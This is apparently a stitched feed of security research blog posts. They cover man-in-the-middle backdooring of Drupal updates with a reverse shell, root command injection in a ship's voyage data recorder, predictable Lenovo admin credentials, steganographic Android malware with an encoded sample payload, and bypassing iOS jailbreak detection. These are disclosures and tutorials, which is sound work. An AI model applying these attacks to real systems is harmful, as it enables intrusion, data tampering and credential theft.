RESEARCH | January 6, 2016

Drupal – Insecure Update Process

Just a few days after installing Drupal v7.39, I noticed there was a security update available: Drupal v7.41. This new version fixes an open redirect in the Drupal core. In spite of my Drupal update process checking for updates, according to my local instance, everything was up to date: 

Issue #1: Whenever the Drupal update process fails, Drupal states that everything is up to date instead of giving a warning.

 

The issue was due to some sort of network problem. Apparently, in Drupal 6 there was a warning message in place, but this is not present in Drupal 7 or Drupal 8.
 
Nevertheless, if the scheduled update process fails, it is always possible to check for the latest updates by using the link that says “Check Manually“. This link is valuable for an attacker because it can be used to perform a cross-site request forgery (CSRF) attack to force the admin to check for updates whenever they decide:
 
  • http://yoursite/?q=admin/reports/updates/check
 
Since there is a CSRF vulnerability in the “Check manually” functionality (Drupal 8 is the only one not affected), this could also be used as a server-side request forgery (SSRF) attack against drupal.org. Administrators may unwillingly be forcing their servers to request unlimited amounts of information from updates.drupal.org to consume network bandwidth.
 
Issue #2: An attacker may force an admin to check for updates due to a CSRF vulnerability on the update functionality
 
An attacker may care about updates because they are sent unencrypted, as the following Wireshark screenshot shows: 

 

 

To exploit unencrypted updates, an attacker must be suitably positioned to eavesdrop on the victim’s network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection, such as public WiFi, or a corporate or home network that is shared with a compromised computer.  
 
The update process downloads a plaintext version of an XML file at http://updates.drupal.org/release-history/drupal/7.x and checks to see if it is the latest version. This XML document can point to a backdoored version of Drupal.  

 

  1. The current security update (named on purpose “7.41 Backdoored“)
  2. The security update is required and a download link button
  3. The URL of the malicious update that will be downloaded
 
However, updating Drupal is a manual process. Another possible attack vector is to offer a backdoored version of any of the modules installed on Drupal. In the following example, a fake “Additional Help Hint” update is offered to the user:

 

 

Offering fake updates is a simple process. Once requests are being intercepted, a fake update response can be constructed for any module. When administrators click on the “Download these updates” buttons, they will start the update process.
 
This is how it looks from an attacker’s perspective before and after upgrading the “Additional Help Hint” module. First it checks for the latest version, and then it downloads the latest (malicious) version available. 


As part of the update, I included a reverse shell from pentestmonkey (http://pentestmonkey.net/tools/web-shells/php-reverse-shell) that will connect back to me, let me interact with the Linux shell, and finally, allow me to retrieve the Drupal database password:


Issue #3: Drupal security updates are transferred unencrypted without checking the authenticity, which could lead to code execution and database access.
 
You may have heard about such things in the past. Kurt Seifried from Linux Magazine wrote an article entitled “Insecure updatesare the rule, not the exception” that mentioned that Drupal (among others) were not checking the authenticity of the software being downloaded. Moreover, Drupal itself has had an open discussion about this issue since April 2012 (https://www.drupal.org/node/1538118). This discussion was reopened after I reported the previous vulnerabilities to the Drupal Security Team on the 11th of November 2015.
 
You probably want to manually download updates for Drupal and their add-ons. At the moment of publishing there are no fixes available.
 

TL;DR – It is possible to achieve code execution and obtain the database credentials when performing a man-in-the-middle attack against the Drupal update process. All Drupal versions are affected.

RESEARCH | December 9, 2015

Maritime Security: Hacking into a Voyage Data Recorder (VDR)

In 2014, IOActive disclosed a series of attacks that affect multiple SATCOM devices, some of which are commonly deployed on vessels. Although there is no doubt that maritime assets are valuable targets, we cannot limit the attack surface to those communication devices that vessels, or even large cruise ships, are usually equipped with. In response to this situation, IOActive provides services to evaluate the security posture of the systems and devices that make up the modern integrated bridges and engine rooms found on cargo vessels and cruise ships. [1]

 

There are multiple facilities, devices, and systems located on ports and vessels and in the maritime domain in general, which are crucial to maintaining safe and secure operations across multiple sectors and nations.

 

Port security refers to protecting all of these assets from acts of piracy, terrorism, and other unlawful activities, such as smuggling. Recent activity appears to demonstrate that cyberattacks against this sector may have been underestimated. As threats evolve, procedures and policies must improve to take these new attack scenarios into account. For example,https://www.federalregister.gov/articles/2014/12/18/2014-29658/guidance-on-maritime-cybersecurity-standards

 

This blog post describes IOActive’s research related to one type of equipment usually present in vessels, Voyage Data Recorders (VDRs). In order to understand a little bit more about these devices, I’ll detail some of the internals and vulnerabilities found in one of these devices, the Furuno VR-3000.

 

What is a Voyage Data Recorder?

(http://www.imo.org/en/OurWork/Safety/Navigation/Pages/VDR.aspx ) A VDR is equivalent to an aircraft’s ‘BlackBox’. These devices record crucial data, such as radar images, position, speed, audio in the bridge, etc. This data can be used to understand the root cause of an accident.

 

Real Incidents

Several years ago, piracy acts were on the rise. Multiple cases were reported almost every day. As a result, nation-states along with fishing and shipping companies decided to protect their fleet, either by sending in the military or hiring private physical security companies.

On February 15, 2012, two Indian fishermen were shot by Italian marines onboard the Enrica merchant vessel, who supposedly opened fire thinking they were being attacked by pirates. This incident caused a serious diplomatic conflict between Italy and India, which continues to the present. https://en.wikipedia.org/wiki/Enrica_Lexie_case

 

‘Mysteriously’, the data collected from the sensors and voice recordings stored in the VDR during the hours of the incident was corrupted, making it totally unusable for authorities to use during their investigation.  As this story, from Indian Times, mentions the VDR could have provided authorities with crucial clues to figure out what really happened.

 

Curiously, Furuno was the manufacturer of the VDR that was corrupted in this incident. This Kerala High Court’s document covers this fact: http://indiankanoon.org/doc/187144571/ However, we cannot say whether the model Enrica Lexie was equipped with was the VR-3000. Just as a side note, the vessel was built in 2008 and the Furuno VR-3000 was apparently released in 2007.

 

Just a few weeks later, on March 1, 2012, the Singapore-flagged cargo ship MV. Prabhu Daya was involved in a hit-and-run incident off the Kerala Coast. As a result, three fishermen were killed and one more disappeared and was eventually rescued by a fishing vessel in the area. Indian authorities initiated an investigation of the accident that led to the arrest of the MV. Prabhu Daya’s captain.

During that process, an interesting detail was reported in several Indian newspapers.

http://www.thehindu.com/news/national/tamil-nadu/voyage-data-recorder-of-prabhu-daya-may-have-been-tampered-with/article2982183.ece

 

So, What’s Going on Here?

From a security perspective, it seems clear VDRs pose a really interesting target. If you either want to spy on a vessel’s activities or destroy sensitive data that may put your crew in a difficult position, VDRs are the key.

 

Understanding a VDR’s internals can provide authorities, or third-parties, with valuable information when performing forensics investigations. However, the ability to precisely alter data can also enable anti-forensics attacks, as described in the real incident previously mentioned.

 

As usual, I didn’t have access to the hardware; but fortunately, I played some tricks and found both firmware and software for the target VDR. The details presented below are exclusively based on static analysis and user-mode QEMU emulation (already explained in a previous blog post). [2]
 
Figure: Typical architecture of a VR-3000

 

Basically, inside the Data Collecting Unit (DCU) is a Linux machine with multiple communication interfaces, such as USB, IEEE1394, and LAN. Also inside the DCU, is a backup HDD that partially replicates the data stored on the Data Recording Unit (DRU). The DRU is protected against aggressions in order to survive in the case of an accident. It also contains a Flash disk to store data for a 12 hour period. This unit stores all essential navigation and status data such bridge conversations, VHF communications, and radar images.

 

The International Maritime Organization (IMO) recommends that all VDR and S-VDR systems installed on or after 1 July 2006 be supplied with an accessible means for extracting the stored data from the VDR or S-VDR to a laptop computer. Manufacturers are required to provide software for extracting data, instructions for extracting data, and cables for connecting between a recording device and computer.

 

The following documents provide more detailed information:
Furuno Vr3000 LivePlayer Version 4 Operator’s Manual for Version 2.xx.
After spending some hours reversing the different binaries, it was clear that security is not one of its main strengths of this equipment. Multiple services are prone to buffer overflows and command injection vulnerabilities. The mechanism to update firmware is flawed. Encryption is weak. Basically, almost the entire design should be considered insecure.
 

Take this function, extracted from from the Playback software, as an example of how not to perform authentication. For those who are wondering what ‘Encryptor’ is, just a word: Scytale.

 

Digging further into the binary services we can find a vulnerability that allows unauthenticated attackers with remote access to the VR-3000 to execute arbitrary commands with root privileges. This can be used to fully compromise the device. As a result, remote attackers are able to access, modify, or erase data stored on the VDR, including voice conversations, radar images, and navigation data.

VR-3000’s firmware can be updated with the help of Windows software known as ‘VDR Maintenance Viewer’ (client-side), which is proprietary Furuno software.

 

The VR-3000 firmware (server-side) contains a binary that implements part of the firmware update logic: ‘moduleserv’

 

This service listens on 10110/TCP.

 

Internally, both server (DCU) and client-side (VDR Maintenance Viewer, LivePlayer, etc.) use a proprietary session-oriented, binary protocol. Basically, each packet may contain a chain of ‘data units’, which, according to their type, will contain different kinds of data.

 

Figure: Some of the supported commands
‘moduleserv’ several control messages intended to control the firmware upgrade process. Let’s analyze how it handles a ‘SOFTWARE_BACKUP_START’ request:
An attacker-controlled string is used to build a command that will be executed without being properly sanitized. Therefore, this vulnerability allows remote unauthenticated attackers to execute arbitrary commands with root privileges.
Figure: ‘Moduleserv’ v2.54 packet processing
Figure: ‘Moduleserv’ v2.54 unsanitized system call

 

At this point, attackers could modify arbitrary data stored on the DCU in order to, for example, delete certain conversations from the bridge, delete radar images, or alter speed or position readings. Malicious actors could also use the VDR to spy on a vessel’s crew as VDRs are directly connected to microphones located, at a minimum, in the bridge.

 

However, compromising the DCU is not enough to cover an attacker’s tracks, as it only contains a backup HDD, which is not designed to survive extreme conditions. The key device in this anti-forensics scenario would be the DRU. The privileged position gained by compromising the DCU would allow attackers to modify/delete data in the DRU too, as this unit is directly connected through an IEEE1394 interface. The image below shows the structure of the DRU.
Figure: Internal structure of the DRU

Before IMO’s resolution MSC.233(90) [3], VDRs did not have to comply with security standards to prevent data tampering. Taking into account that we have demonstrated these devices can be successfully attacked, any data collected from them should be carefully evaluated and verified to detect signs of potential tampering.

 

IOActive, following our responsible disclosure policy, notified the CERT/CC about this vulnerability in October 2014. The CERT/CC, working alongside the JPCERT/CC, were in contact with Furuno and were able to reproduce and verify the vulnerability. Furuno committed to providing a patch for their customers “sometime in the year of 2015.” IOActive does not have further details on whether a patch has been made available.
 
References
————–

RESEARCH | November 25, 2015

Privilege Escalation Vulnerabilities Found in Lenovo System Update

Lenovo released a new version of the Lenovo System Update advisory (https://support.lenovo.com/ar/es/product_security/lsu_privilege) about two new privilege escalation vulnerabilities I had reported to Lenovo a couple of weeks ago (CVE-2015-8109, CVE-2015-8110). IOActive and Lenovo have issued advisories on these issues.
 

Before digging into the details, let’s go over a high-level overview of how the Lenovo System Update pops up the GUI application with Administrator privileges.
 
Here is a discussion of the steps depicted above:


1 – The user starts System Update by running the tvsu.exe binary which runs the TvsuCommandLauncher.exe with a specific argument. Previously, Lenovo fixed vulnerabilities that IOActive discovered where an attacker could impersonate a legitimate caller and pass the command to be executed to the SUService service through named pipes to gain a privilege escalation. In the newer version, the argument is a number within the range 1-6 that defines a set of tasks within the dll TvsuServiceCommon.dll

 

2 – TvsuCommandLauncher.exe then, as usual, contacts the SUService service that is running with System privileges, to process the required query with higher privileges.

 

3 – The SUService service then launches the UACSdk.exe binary with System privileges to prepare to execute the binary and run the GUI interface with Administrator privileges.

 

4 – UACSdk.exe checks if the user is a normal unprivileged user or a Vista Administrator with the ability to elevate privileges.

 

5 – Depending on user privileges:

 

    • For a Vista Admin user, the user’s privileges are elevated.
    • For an unprivileged user, UACSdk.exe creates a temporary Administrator account with a random password which is deleted it once the application is closed.

The username for the temporary Administrator account follows the pattern tvsu_tmp_xxxxxXXXXX, where each lowercase x is a randomly generated lower case letter and each uppercase X is a randomly generated uppercase letter. A 19-byte, random password is generated.


Here is a sample of a randomly created user:    



6 – Through tvsukernel.exe binary, the main Lenovo System Update GUI application is then run with Administrator privileges. 




BUG 1 : Lenovo System Update Help Topics Privilege Escalation
The first vulnerability is within the Help system and has two entry points by which a user can open an online help topic that starts an instance of Internet Explorer.

1 – The link in the main application interface 

 
 

2 – By clicking on the Help icon 
at top right and then clicking Settings
 

 

 

 
Since the main application Tvsukernel.exe is running as Administrator, the web browser instance that starts to open a Help URL inherits the parent Administrator privileges.
From there, an unprivileged attacker has many ways to exploit the web browser instance running under Administrator privileges to elevate his or her own privileges to Administrator or SYSTEM.
BUG 2 : Lenovo System Weak Cryptography Function Privilege Escalation
Through a more technical bug and exploitable vulnerability, the temporary administrator account is created in specific circumstances related to Step 5b in the overview.
The interesting function for setting the temporary account is sub_402190 and contains the following important snippets of code:
 
 
The function sub_401810 accepts three arguments and is responsible for generating a random string pattern with the third argument length.
 
Since sub_401810 generates a pattern using RAND, the initialization of the seed is based on the addition of current time and rand values and defined as follows:
 
 
 
Once the seed is defined, the function generates the random value using a loop with RAND and division/multiplication with specific values.
 
Rather than posting the full code, I’ll note that a portion of those loops looks like the following:
 
 
 
The first call to this function is used to generate the 10-letter suffix for the Administrator username that will be created as “tvsu_tmp_xxxxxXXXXX”
 
Since it is based on rand, the algorithm is actually predictable. It is possible for an attacker to regenerate the same username based on the time the account was created.
 
To generate the password (which is more critical), Lenovo has a more secure method: Microsoft Crypto API (Method #1) within the function sub_401BE0. We will not dig into this method, because the vulnerability IOActive discovered is not within this function. Instead, let’s look at how Method #2 generates a password, if Method #1 fails.
 
Let’s return to the snippets of code related to password generation:
 
 
 
We can clearly see that if function sub_401BE0 fails, the execution flow fails back using the custom RAND-based algorithm (defined earlier in function sub_401810) to generate a predictable password for the temporary Administrator account. In other words, an attacker could predict the password created by Method #2.
 

This means an attacker could under certain circumstances predict both the username and password and use them to elevate his or her privileges to Administrator on the machine.
EDITORIAL | October 16, 2015

Five Reasons Why You Should Go To BruCON

BruCON is one of the most important security conferences in Europe. Held each October, the ‘Bru’ in ‘BruCON’ refers to Brussels, the capital of Belgium, where it all started. Nowadays, it’s held in the beautiful city of Ghent, just 55 mins from its origin. I had the chance to attend this year, and here are the five things that make it a great conference, in my opinion.

You can check out BruCON’s promo video here: https://www.youtube.com/watch?v=ySmCRemtMc4.
1. The conference
Great talks presented by international speakers; from deeply technical talks, to threat intelligence and other high-level stuff. You might run into people and friends from Vegas or another security conference.
A circular and well illuminated stage. You better not be caught taking a nap, unless you want a picture of yourself sleeping on the Internet.

(Shyama Rose talking about BASE jumping and risk)

While paid trainings take place two or three days before the conference, free workshops are available to the public during the two-day conference.

(Beau Woods (@beauwoods) giving a cool workshop named:

«Escalating Privileges Through Better Communication»)

While at BruCON, I presented my research on security deficiencies in electroencephalography (EEG) technologies. EEG is a non-invasive method of recording electrical brain activity (synaptic activity between neurons) taken from the scalp. EEG has increasingly been adopted across different industries, and I showed how the technology is prone to common network and application attacks. I demonstrated brain signal sniffing and data tampering through man-in-the-middle attacks, as well as denial-of-service bugs in EEG servers. Client-side applications that analyze EEG data are also prone to application flaws, and I showed how trivial fuzzing can uncover many of them. You can find the related material here: slides, demos (videos) [resource no longer available], and my live talk (video).
2. The city
The medieval architecture in Ghent will enchant you. It’s a really cool city, everywhere you look. Full of restaurants, cafes, and of course, pubs. Students from all ages also make this city full of vibe. You can easily spend two more days and enjoy all Ghent has to offer.
All of this is just around the corner from the venue.
3. The b33r
I’m not a b33r connoisseur, but most of the beers I tasted while in Ghent were, according to my taste, really good. Belgium is catalogued as one of the best beer countries in the world, which speaks for itself. In a nice gesture by the conference organizers, speakers were given a single bottle of a hard-to-find beer, Westvleteren 12, which has been rated as “the best beer in the world.” I have no idea know how they got them, as the brewer does not produce large amounts of this beer and only sells it to a select few people.
Beer at the venue, beer between talks, and there was even a night where we mixed good beer with ice cream. It was interesting.
4. The venue
The conference is held in the heart of the city, near all the hotels, just two or three blocks from where you’re most likely to stay. The organizers thought out every single detail to help you arrive right on time at the venue.
The main hall is perfect for networking and serves b33r, coffee, and food all day, not only during specific hours.
A renowned hacker DJ is dropping some bass or a pianist girl (computer scientist who wrote code for Google) took turns to make those moments even better.

 

Wouldn’t be a good conference without a Wall of Sheep; it was RickRolled though ;D
(Picture taken by @sehnaoui)
The party venue, just three blocks from the stage, had a good hacker ambience and a good sound atmosphere created by two well-known DJs: @CountNinjula & @KeithMyers.

 

(Picture taken by @wimremes)
5. The old video game consoles
If you’re not interested in a talk, or simply bored, just head upstairs and travel back in time with a whole hall of old consoles. “Here comes a new challenger” are accepted…as long as there’s b33r or money involved.

 

 

 
Well, that’s it, another great security conference for you to consider in the future.
Finally, thanks to all this year’s organizers and volunteers. Perhaps you’ll join in next year 😉

 

(Photo taken by @SenseiZeon)
Cheers!

RESEARCH | September 22, 2015

Is Stegomalware in Google Play a Real Threat?

For several decades, the science of steganography has been used to hide malicious code (useful in intrusions) or to create covert channels (useful in information leakage). Nowadays, steganography can be applied to almost any logical/physical medium (format files, images, audio, video, text, protocols, programming languages, file systems, BIOS, etc.). If the steganographic algorithms are well designed, the hidden information is really difficult to detect. Detecting hidden information, malicious or not, is so complex that the study of steganalytic algorithms (detection) has been growing. You can see the growth in scientific publications (source: Scholar Google) and research investment by governments or institutions.
In fact, since the attacks on September 11, 2001, there has been a lot of discussion on the possibility of terrorists using this technology. See:
 
 
 
 
In this post, I would like to illustrate steganography’s ability to hide data in Android applications. In this experiment, I focus on Android applications published in Google Play, leaving aside alternative markets with lower security measures, where it is easier to introduce malicious code.
 
 
Is it possible to hide information on Google Play or in the Android apps released in it?
 
The answer is easy: YES! Simple techniques have been documented, from hiding malware by renaming the file extension (Android / tr DroidCoupon.A – 2011, Android / tr SmsZombie.A – 2012, Android / tr Gamex.A – 2013) to more sophisticated procedures (AngeCryption – BlackHat Europe October2014).
 
Let me show some examples in more depth:
 
 
Google Play Web (https://play.google.com)
 
Google Play includes a webpage for each app with information such as a title, images, and a text description. Each piece of information could conceal data using steganography (linguistic steganography, image steganography, etc.). In fact, I am going to “work” with digital images and demonstrate how Google “works” when there is hidden information inside of files.
 
To do this, I will use two known steganographic techniques: adding information to the end of file (EOF) and hiding information in the least significant bit (LSB) of each pixel of the image.
      
 
          PNG Images
 
You can upload PNG images to play.google.com that hide information using EOF or LSB techniques. Google does not remove this information.
 
For example, I created a sample app (automatically generated – https://play.google.com/store/apps/details?id=com.wMyfirstbaskeballgame) and uploaded several images (which you can see on the web) with hidden messages. In one case, I used the OpenStego steganographic tool (http://www.openstego.com/) and in another, I added the information at the end of an image with a hex editor.
 
The results can be seen by performing the following steps (analyzing the current images “released” on the website):
Example 1: PNG with EOF
 
 
Step 2: Loot at the end of the file 🙂
Example 2: PNG with LSB
 
 
Step 2: Recover the hidden information using Openstego (key=alfonso)
 
JPEG Images
If you try to upload a steganographic JPEG image (EOF or LSB) to Google Play, the hidden information will be removed. Google reprocesses the image before publishing it. This does not necessarily mean that it is not possible to hide information in this format. In fact, in social networks such as Facebook, we can “avoid” a similar problem with Secret Book or similar browser extensions. I’m working on it…
 
https://chrome.google.com/webstore/detail/secretbook/plglafijddgpenmohgiemalpcfgjjbph?hl=en-GB
 
In summary, based on the previous proofs, I can say that Google Play allows information to be hidden in the images of each app. Is this useful? It could be used to exchange hidden information (covert channel using the Google Play). The main question is whether an attacker could use information masked for some evil purpose. Perhaps they could use images to encode executable code that “will exploit” when you are visiting the web (using for example polyglots + stego exploits) or another idea. Time will tell…
 
 
 
APK Steganography
 
Applications uploaded toGoogle Play are not modified by the market. That is, an attacker can use any of the existing resources in an APK to hide information, and Google does not remove that information. For example, machine code (DEX), PNG, JPEG, XML, and so on.
 
 
Could it be useful to hide information on those resources?
 
An attacker might want to conceal malicious code on these resources and hinder automatic detection (static and dynamic analysis) that focuses on the code (DEX). A simple example would be an application that hides a specific phone number in an image (APT?).
 
The app verifies the phone number, and after a few clicks in a specific screen on a mobile phone, checks if the number is equal to that stored in the picture. If the numbers match, you can start leaking information (depending on the permissions allowed in the application).
 
I want to demonstrate the potential of Android stegomalware with a PoC. Instead of developing it, I will analyze an active sample that has been on Google Play since June 9, 2014. This stegomalware was developed by researchers at Universidad Carlos III de Madrid, Spain (http://www.uc3m.es). This PoC hides a DEX file (executable code) in an image (resource) of the main app. When the app is running, and the user performs a series of actions, the image recovers the “new” DEX file. This code runs and connects to a URL with a payload (in this case harmless). The “bad” behavior of this application can only be detected if we analyze the resources of the app in detail or simulate the interaction the app used for triggering the connection to the URL.
 
Let me show how this app works (static manual analysis):
Step 1: Download the APK to our local store. This requires a tool, such as an APK downloader extension or a specific web as http://apps.evozi.com/apk-downloader/
Step 2. Unzip the APK (es.uc3m.cosec.likeimage.apk)
Step 3. Using the Stegdetect steganalytic tool (https://github.com/abeluck/stegdetect) we can detect hidden information in the image “likeimage.jpg”. The author used the F5 steganographic tool (https://code.google.com/p/f5-steganography/).
 
es.uc3m.cosec.likeimageresdrawable-hdpilikeimage.jpg
likeimage.jpg : f5(***)
Step 4. To analyze (reverse engineer) what the app is doing with this image, I use the dex2jar and jd tools.
Step 5. Analyzing the code, we can observe the key used to hide information in the image. We can recover the hidden content to a file (bicho.dex).
java -jar f5.jar x -p cosec -e bicho.dex likeimage.jpg
 
Step 6. Analyzing the new file (bicho.dex), we can observe the connection to http://cosec-uc3m.appspot.com/likeimage for downloading a payload.
 
Step 7. Analyzing the code and payload, we can demonstrate that it is inoffensive.
ZGV4CjAzNQDyUt1DKdvkkcxqN4zxwc7ERfT4LxRA695kAgAAcAAAAHhWNBIAAAAAAAAAANwBAAAKAAAAcAAAAAQAAACYAAAAAgAAAKgAAAAAAAAAAAAAAAMAAADAAAAAAQAAANgAAABsAQAA+AAAACgBAAAwAQAAMwEAAD0BAABRAQAAZQEAAKUBAACyAQAAtQEAALsBAAACAAAAAwAAAAQAAAAHAAAAAQAAAAIAAAAAAAAABwAAAAMAAAAAAAAAAAABAAAAAAAAAAAACAAAAAEAAQAAAAAAAAAAAAEAAAABAAAAAAAAAAYAAAAAAAAAywEAAAAAAAABAAEAAQAAAMEBAAAEAAAAcBACAAAADgACAAEAAAAAAMYBAAADAAAAGgAFABEAAAAGPGluaXQ+AAFMAAhMTUNsYXNzOwASTGphdmEvbGFuZy9PYmplY3Q7ABJMamF2YS9sYW5nL1N0cmluZzsAPk1BTElDSU9VUyBQQVlMT0FEIEZST00gVEhFIE5FVDogVGhpcyBpcyBhIHByb29mIG9mIGNvbmNlcHQuLi4gAAtNQ2xhc3MuamF2YQABVgAEZ2V0UAAEdGhpcwACAAcOAAQABw4AAAABAQCBgAT4AQEBkAIAAAALAAAAAAAAAAEAAAAAAAAAAQAAAAoAAABwAAAAAgAAAAQAAACYAAAAAwAAAAIAAACoAAAABQAAAAMAAADAAAAABgAAAAEAAADYAAAAASAAAAIAAAD4AAAAAiAAAAoAAAAoAQAAAyAAAAIAAADBAQAAACAAAAEAAADLAQAAABAAAAEAAADcAQAA
 
The code that runs the payload:
 
Is Google detecting these “stegomalware”?
 
Well, I don’t have the answer. Clearly, steganalysis science has its limitations, but there are other ways to monitor strange behaviors in each app. Does Google do it? It is difficult to know, especially if we focus on “mutant” applications. Mutant applications are applications whose behavior could easily change. Detection would require continuous monitoring by the market. For example, for a few months I have analyzed a special application, including its different versions and the modifications that have been published, to observe if Google does anything with it. I will show the details:
Step 1. The mutant app is “Holy Quran video and MP3” (tr.com.holy.quran.free.apk). Currently at https://play.google.com/store/apps/details?id=tr.com.holy.quran.free

Step 2.  Analyzing the current and previous version of this app, I discover connections to specific URLs (images files). Are these truly images? Not all.

Step 3. Two URLs that the app connects to are very interesting. In fact, they aren’t images but SQLite databases (with messages in Turkish). This is the trivial steganography technique of simply renaming the file extension. The author changed the content of these files:

Step 4. If we analyze these databases, it is possible to find curious messages. For example, recipes with drugs.

Is Google aware of the information exchanged using their applications? This example does not cease to be a mere curiosity, but such procedures might violate the policy of publication of certain applications on the market or more serious things.
 
Figure: Recipes inside the file io.png (SQLite database)

In summary, this small experiment shows that we can hide information on Google Play and Android apps in general. This feature can be used to conceal data or implement specific actions, malicious or not. Only the imagination of an attacker will determine how this feature will be used…


Disclaimer: part of this research is based on a previous research by the author at ElevenPaths
RESEARCH | September 15, 2015

The iOS Get out of Jail Free Card

If you have ever been part of a Red Team engagement, you will be familiar with the “Get out of Jail Free Card”. In a nutshell, it’s a signed document giving you permission to perform the activity you were caught doing. In some instances, it’s the difference between walking away and spending the night in a jail cell. You may be saying, “Ok, but what does a Get out of Jail Free Card have to do with iOS applications?”

Well, iOS mobile application assessments usually occur on jailbroken devices, and application developers often implement measures that seek to thwart this activity. The tester often has to come up with clever ways of bypassing detection and breaking free from this restriction, a.k.a. “getting out of jail”. This blog post will walk you through the steps required to identify and bypass frequently recommended detection routines. It is intended for persons who are just getting started in reverse engineering mobile platforms. This is not for the advanced user.

Environment Setup
§  Jailbroken iPhone 4S (iOS 7.xx)
§  Xcode 6.4 (command-line tools)
§  IDA Pro or Hopper
§  Mac OS X
 
Intro to ARM Architecture
Before we get started, let’s cover some very basic groundwork. iOS applications are compiled to native code for the ARM architecture running on your mobile device. The ARM architecture defines sixteen 32-bit general-purpose registers, numbered from R0-R15. The first 12 are for general-purpose usage, and the last three have special meaning. R13 is denoted as the stack pointer (SP), R14 the link register (LR), and R15 the program counter (PC). The link register normally holds the return address during a function call. R0-R3 hold arguments passed to functions with R0 storing the return value. For the purposes of this post, the most important takeaway is that register R0 holds the return value from a function call. See the references section for additional details on the ARM architecture.
Detecting the Jailbreak
When a device is jailbroken, a number of artifacts are often left behind. Typical jailbreak detection routines usually involve checking for those artifacts before allowing access to the application. Some of the checks you will often see include checking for:
  • Known file paths
  • Use of non-default ports such as port 22(OpenSSH), which is often used to connect to and administer the device
  • Symbolic links to various directories (e.g. /Applications, etc.)
  • Integrity of the sandbox (i.e. a call to fork() should return a negative value in a properly functioning sandbox)

In addition to the above, developers will often seek to prevent us from debugging the process with the use of PT_ATTACH_DENY, which prevents the use of the ptrace() system call (a call used in the debugging of iOS applications). The point is, there are a multitude of ways developers try to thwart our efforts as pen testers. That discussion, however, is beyond the scope of this post. You are encouraged to check out the resources included in the references section. Of the resources listed, The Mobile Application Hackers Handbook does a great job covering the topic.

Simple PoC
We begin with bypassing routines that check for known file paths. This approach will lay the foundation for bypassing the other checks later on. To demonstrate this, I wrote a very simple PoC that checks for the existence of some these files. In the event one is found, the program prints out a message stating the device is jailbroken. In a real world scenario, the application may perform a number of actions that include, but are not limited to, preventing you from accessing the application entirely or restricting access to parts of the application.
Figure 1: Jailbreak detection PoC
 
If you have a jailbroken device and would like to test this for yourself, you can use clang – the Clang C, C++, and Objective-C compiler to compile it from your Mac OS host. Refer to the man page for details on the following command.
clang -framework Foundation -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ jailbreak.c -o jailbreak -miphoneos-version-min=5.0
Once compiled, simply copy the binary to your jailbroken device and execute it from the command line. On a side note, Objective-C is a strict superset of C, and in most instances you will see jailbreak detections implemented in C/C++. A sample run of the program reveals that the device is jailbroken:
Figure 2: PoC execution showing device is jailbroken
 
One of the first steps during an assessment is static analysis on the binary. Let’s begin by viewing the symbols with the following command nm jailbreak

Figure 3: Static analysis – extracting symbol information
 
Luckily for us, symbols have not been stripped, and based on the above, the _isJailBrokenmethod looks like the function responsible for determining the state of the device.
Figure 4: Examining the binary in IDA
 
The isJailBrokenmethod is called at 0000BE22, after which the value in R0 is compared to 0. Recall from earlier that the return value from a function call is stored in the R0 register. Let’s confirm this in gdb. We will set a break point at 0000BE28the BEQ (branch if eq) instruction and examine the contents of the R0 register.

Figure 5: Examining the contents of the R0 register

As expected the value at R0 is 1, and the program takes the branch that prints the message “Device is JAILBROKEN”. Our goal then is to take the other branch. Let’s examine the isJailBroken function.

Figure 6: isJailBroken function analysis

At 0000BEA0, the stat function is called, and at 0000BEA8, R0 is compared to 0. If the value is not zero, meaning the path hasn’t been found, the program processes the next file path in the jbFiles[] array shown in the PoC earlier on. However, if the path was found, we see R0 is set to 1 before the program returns and eventually exits.

Figure 7: Determining where R0 register is set

This above snippet corresponds to the following section in our PoC:

Figure 8: R0 gets set to 1 if artifact found
 
So if we update this, and instead of moving 1 in R0 we move a 0, we should be able to bypass the jailbreak detection check and thus get of jail. Let’s make this modification and run our binary again.
Figure 9: Updating R0 register to 0
 
Linking this to our PoC, it is the equivalent of doing:
Figure 10: Effect of setting R0 to 0
 
In other words, the isJailBroken function will always return 0. Let’s set another breakpoint after the comparison like we did before and examine the value in R0. If we are right, then according to the following snippet, we should branch to loc_BE3C and defeat the check.
Figure 11: PoC snippet
 
As expected the value is now 0, and when we continue program execution we get our desired result.

Figure 12: Bypassing the detection
 
But what if the binary has been stripped?
Earlier we said that we were lucky because the binary was not stripped, so we had the symbol information. Suppose however, that the developer decided to make our job a bit more difficult by stripping the binary (in our case we used strip <binaryname>). In this case, our approach would be a bit different. Let’s first look at the stripped binary using the nm tool:
Figure 13: Stripped binary
 
And then with gdb on the jailbroken mobile device:
Figure 14: Examining the stripped binary in gdb
 
It should be immediately clear that we now have a lot less information to work with. In the case of gdb, we now see “No symbol table is loaded”. Where has our isJailBrokensymbol gone? Let’s push ahead with our analysis by running strings on the binary.
Figure 15: Extracting strings from the binary
 
Ok, so we seem to be getting closer as we can see some familiar messages. Let’s head back to IDA once again:
Figure 16: Disassembled stripped binary
 
This certainly looks different from what we saw when the symbols were included. Nonetheless, let’s find the references to the strings we saw earlier. You can use the strings view in IDA and then use Ctrl+X to find all references to where they are used.
Figure 17: Locating references to the status message
 
Navigating to the highlighted location, we again see the familiar CMP R0, #0:
Figure 18: Locating CMP R0, #0
 
And if we go to the highlighted sub_BE54, we end up in our isJailBroken function. From that point on, it’s a repeat of what we already discussed.
Ok, but the functions are now inline
Another practice that is often recommended is to inline your functions. This causes the compiler to embed the full body of the function, as opposed to making a function call. With this in mind, our modified isJailBroken function declaration now looks like this:
Figure 19: Declaring functions inline
 
Before we continue, let’s remind ourselves of what the disassembled binary looked like prior to this change:

Figure 20: Binary before inline function
 
Now, let’s examine the modified binary:
Figure 21: Modified binary with function now inline
The _isJailBrokenmethod has now been inlined, and we no longer see the call(bl) instruction at 0000BE22 as before. Note that the original function body is still stored in the binary:
Figure 22: Function body still stored despite being inline
 
To prevent this, some very astute developers will go a step further and make the function static thereby removing the function body. The new function declaration will now be:
Figure 23: Static inline function
 
Again let’s look at this in IDA.
Figure 24: Disassembled inline binary
 
Instead of R0 being set from a function call as we saw previously, it is set from a value read from the stack using the LDRcommand at 0000BE9C. On closer examination we see the R0 register being set at 0000BE8Aand 0000BE98 and then stored on the stack:
Figure 25: Disassembled inline binary
At this point it’s the same process as before, we just need to move a 0 into R0at location 0000BE8A. And the rest is history.
Let’s block debugging then
